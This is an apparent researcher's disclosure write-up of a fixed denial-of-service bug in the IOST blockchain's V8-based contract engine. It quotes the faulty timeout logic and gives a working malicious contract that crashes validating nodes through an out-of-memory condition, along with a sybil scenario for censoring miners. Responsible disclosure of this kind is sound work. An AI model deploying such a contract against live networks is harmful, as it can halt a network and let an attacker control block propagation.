Welcome back. Today we come back to IOST. As we mentioned before, IOST team contacted us and we've been working together since. Today's report is on an already fixed vulnerability allowing the attacker to critically damage whole network with just sending calls to a specially crafted contract.
The proof of knowledge is provided at the end of the article as usual for already fixed vulnerabilities.
Before we start, let's just quickly mention Nebulas. There was no official reaction. The team pretends nothing is going on and no effort was made to fix the vulnerability we discovered, nor to contact us. Unofficially, Nebulas subreddit moderator claimed the developers communicate with him and claim that the bug exists, but not really. Such a conclusion does not make much sense as we explain in the discussion with the moderator.
Exhausting VM Memory With Timed Out Transaction
Bug type: DoS
Bug severity: 7/10
Scenario 1
Attacker cost: very low
In this scenario the attacker's goal is to halt the network. The attacker crashes all public nodes in the system, after which the network becomes dysfunctional. In order to do that, the attacker creates a special transaction and propagates it to the network. When the transaction is put into the block, all nodes that attempt to validate the block crash.
Scenario 2
Attacker cost: medium
In this scenario, the attacker performs a sybil attack against the network – she sets up a large number of public nodes. Then she will perform Scenario 1 attack repeatedly, until all public nodes of other operators are off-line. When this happens, the attacker has a full control over the traffic in the network and therefore she can control which transactions and which blocks will be propagated to other nodes. This allows the attacker to perform various kinds of additional attacks. For example it is possible for the attacker to censor blocks from specific miner in order to have the miner punished for not producing blocks.
Description
The codebase state at the time of writing can be seen here.
IOST implements smart contract functionality leveraging V8 JavaScript engine from Google. This allows users of IOST to deploy smart contracts written in JavaScript. However, V8 by itself is not suitable for consensus critical operation, for example because it does not guarantee determinism of execution.
This is why IOST implemented a lot of restrictions on the top of V8. Two examples of such restrictions relevant to this report are contract execution time limit and contract execution memory limit. There is a certain time limit before which the contract execution must end, otherwise the contract is forcefully terminated. We can see the management thread loop that does periodical checks of the time limit in sandbox.cc. This loop checks whether the execution of the contract has finished successfully, or whether it failed with exception, or whether it exceeded the gas limit, or whether it is over the time limit. We can see that the memory usage check is commented out. Instead it can be found elsewhere – at every 10th execution of IOSTContractInstruction_Incr(). The contracts to be executed are analyzed and IOSTContractInstruction_Incr() function calls are injected literally everywhere in them in order to calculate gas usage as well as enforce the memory usage limit. The memory limit is set to 100 MB.
What happens when a transaction execution does not end within the time limit? The miner will include it in a block and it marks it as timed out in its receipt. Such a block is then propagated to all peers of the miner. However, timed out transactions are not processed by validators as they were by the miner. We can see the logic in verify function:
if r.Status.Code == tx.ErrorTimeout {
if blk.Head.Rules().IsFork3_0_10 {
to = 0
} else {
to = timeout / 2
}
} else {
to = timeout * 2
}
This code says that because the fork 3.0.10 is already active, the time limit on the validator's side will be set to 0 in case the transaction is marked as timed out. So instead of the original timeout of 200 ms for transaction execution, validators set the timeout to 0 ms. This is probably to enforce the validator will be more stable to reach the same conclusion as the miner – i.e. the execution timed out. However, the zero value is very problematic due to the logic in the management thread. Have a look there again:
std::thread exec(RealExecute, ptr, code, std::ref(result), std::ref(error), std::ref(isJson), std::ref(isDone));
ValueTuple res = { {nullptr, 0}, {nullptr, 0}, isJson, 0 };
// auto startTime = std::chrono::steady_clock::now();
while(true) {
...
auto now = std::chrono::duration_cast<std::chrono::nanoseconds>(std::chrono::system_clock::now().time_since_epoch()).count();
//auto execTime = std::chrono::duration_cast<std::chrono::milliseconds>(now - startTime).count();
if (now > expireTime) {
isolate->TerminateExecution();
copyString(res.Err, ("execution killed, current time : " + std::to_string(now) + " , expireTime: " + std::to_string(expireTime)).c_str());
res.gasUsed = sbx->gasUsed;
break;
}
//usleep(10);
std::this_thread::sleep_for(std::chrono::microseconds(10));
}
if (exec.joinable())
exec.join();
At first, a new thread is being created to run RealExecute(), which is a method that executes scripts inside of V8 engine. The loop is then used to wait until one of the monitored events happen, such as the time limit is exceeded. After that join() is called to wait on the thread running RealExecute() to finish. In case of exceeding the time limit isolate->TerminateExecution() is called to terminate the execution of the script in V8. The problem is that with timeout set to 0 for timed out transactions, the time limit will always trigger immediately on the first check and the loop is broken and join() invoked. All this happens very likely before the operating system prepares and runs the new thread for RealExecute(). This causes isolate->TerminateExecution() to be called too early, before the actual execution of V8 engine is started and therefore this attempt to terminate execution is void. After that it only waits for the new thread to complete with join(), which means that for the actual execution of JavaScript contracts inside RealExecute(), there are no time limits or gas limit checks performed. Note, however, that the memory usage check is still operational because it is no longer in the management loop, where it was commented out.
Malicious Contact Code
Let's consider the following contract code:
class Contract {
init() {}
doom() {
for (let i = 0; i < 1000000; i++) {
IOSTCrypto.sha3("1");
};
let s1 = "a".repeat(1000000000);
let s2 = "b".repeat(1000000000);
let s3 = "c".repeat(1000000000);
return "OK! " + s1 + s2.charAt(18) + s3.charAt(77);
}
}
module.exports = Contract;
This contract is specially designed to exploit the combination of issues described above. The first part of doom() function is calling CPU intensive function IOSTCrypto.sha3() so many times that it won't complete for the miner who attempts to create a new block, but without causing out of gas exception. Therefore, the transaction is marked as timed out and added to the block. Then the block is propagated and validated by the miner's peers. Because of the issue described above with zero timeout, time and gas limits are not enforced during validation and execution of the first part finishes for the validators. The second part is designed in order to cause out of memory condition in V8, where the heap limit is set to about 1.4 GB for 64-bit machines. This must be done carefully because we have to bypass the memory usage check in IOSTContractInstruction_Incr() described above. This is possible because we know that it is only executed on every 10th call to IOSTContractInstruction_Incr(). The code of our contract above is able to do that with the help of very large objects – 1 GB long strings.
Therefore such a call to doom() crashes the V8 machine due to out of memory condition. This subsequently crashes the node which shares the process with V8 engine.
Proof of Knowledge
As usual in case of already fixed bugs, we should present a proof that we were aware of the bug before it was fixed. We do that with the help of OpenTimestamps. Our timestamp data is the following string:
art_of_bug - IOST - Contract call transactions that are terminated by a miner due to timeout can be designed to crash the nodes that attempt to validate blocks that include such transactions. This is caused by an incorrect logic responsible for termination of the V8 engine in combination with an incorrect validation time limit settings for timed out transactions.
The OTS file proving our knowledge converted to hex looks as follows:
004f70656e54696d657374616d7073000050726f6f6600bf89e2e884e8929401083318503cd34bbcfae46c7e53afd8f51b9b7d6894b6969ace4dc838879849787ef01099f568a76a28f3833e9d5f199a84b67908fff0100ba4a74a4019dca83f171fac4c0550b808f1045e6a5ccbf008911819d8dd0f44c60083dfe30d2ef90c8e2e2d68747470733a2f2f616c6963652e6274632e63616c656e6461722e6f70656e74696d657374616d70732e6f7267fff01078798bfb5b30a0c2200b6b9e28c7dbf108f020e1a5e08ce4e1131a14fd1bbe46beb77c8c9a83c0a07cd14a75556c76ab8e403908f1045e6a5cccf008a615eae9700634c50083dfe30d2ef90c8e2c2b68747470733a2f2f626f622e6274632e63616c656e6461722e6f70656e74696d657374616d70732e6f7267f010c281ba9a0258b43a191a1cfb7b01e51008f1045e6a5ccbf0080baea69a81a77c820083dfe30d2ef90c8e292868747470733a2f2f66696e6e65792e63616c656e6461722e657465726e69747977616c6c2e636f6d
If you run OpenTimestamps client correctly, you should see something like this:
This proves that we created the record on 12th March 2020, well before the fix was implemented on 22nd May.